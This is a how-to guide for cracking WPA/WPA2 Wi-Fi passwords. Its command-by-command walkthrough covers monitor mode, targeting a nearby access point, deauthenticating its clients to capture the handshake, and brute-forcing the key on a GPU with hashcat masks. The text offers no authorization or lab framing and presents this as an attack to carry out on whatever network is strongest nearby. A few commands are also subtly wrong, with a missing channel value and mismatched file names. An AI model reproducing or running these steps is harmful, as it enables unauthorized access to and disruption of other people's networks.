There are many ways to crack a WPA/WPA2 password. We all know that a GPU (Graphic Processing Unit) is way faster than a CPU in terms of computation. So, we’ll use the power of GPU to speed up WPA/WPA2 cracking.
The tools used will be (available for both windows and Linux.)
- Aircrack-ng
- Oclhashcat
This guide assumes the following things:
- wlan0 is a WiFi interface
- mon0 is the interface in monitor mode
refers to the channel the target Wi-Fi is operating on - 00:2d:37:4b:e4:d5 is the MAC address of target AP (access point) (not real)
- cc:cc:4e:5b:d7:3d is MAC of client associated with the target AP (not real)
- # (hash symbol) is used to mark start of a command
Steps:
Open up a terminal
Start by putting Wi-Fi interface in monitor mode
#airmon-ng start wlan0
This puts Wi-Fi in monitor mode and creates a new interface mon0 to sniff traffic.
Then, start sniffing air for all AP’s in the area.
#airodump-ng mon0
This will give you information about all AP’s in your vicinity. Select one with highest strength and focus on that one.
Press Ctrl+C to stop above command and type:
#airodump-ng –c –bssid 00:2d:37:4b:e4:d5 –w mon0
This command only sniffs for one specific AP:
-c tells which channel to sniff
-bssid is the MAC of AP to target
-w tell to write a file to capture handshake (for later use in recovering password)
mon0 is the monitor interface
Notice the MAC address of clients shown in the terminal; we’ll need it for the next step.
Now, open a second terminal and type:
#aireplay-ng -0 5 –a 00:2d:37:4b:e4:d5 –c cc:cc:4e:5b:d7:3d mon0
This command says to de-authenticate a client from its AP
-0 tell how many time to send deauth signal (in this case 5 times)
-a tell the MAC of AP
-c tell the MAC of client connect to AP (Note: you can do a broadcast deauth, but it doesn’t work all the time. Target a specific client instead.)
mon0 is our interface. Once you see that airodump-ng shows Handshake captured in upper-right corner, stop the process (otherwise, it keeps deauthing the clients).
Once handshake file is captured and written (in format file.cap), clean the file using the following command:
#wpaclean clean_file.cap captured.cap
Here, clean_file.cap is output file. And, captured.cap is the input file (the file you captured).
Now, prepare the file for hashcat by:
#aircrack-ng clean_file.cap -J for_cat
Here, clean_file.cap is from previous step. And, for_cat is for hashcat use (it will automatically add .hccap extension)
Now, begin the cracking process by:
#oclhashcat –m 2500 –a 3 –session=my_session /for_cat.hccap /mymask.hcmask
Here, –m 2500 tell to crack WPA/WPA2
-a 3 tells to use brute-force or mask based brute force (more on it later)
-session=my_session tell to save the session (in case you plan to resume it later, it takes a very long time.)
/for_cat.hccap is path to your captured and cleaned prepared hashcat file
/mymask.hccap is path to the mask file
Once it’s done, the saved password will be stored in a .pot file (located in /usr/share/oclhashcat/ for kali)
NOTES ON HASHCAT MASKS
The mask can take following format:
- ?u for upper case letters (ABC…)
- ?l for lower case letters (abc…)
- ?d for numbers
- ?s for symbols (ASCII only I think)
- ?a use all of the above characters
Thus to create a mask type in a black file:
- ?d?d?d?d?d?d?d?d for a 8 digit password
That’s it for this tutorial.
Would love to here from you...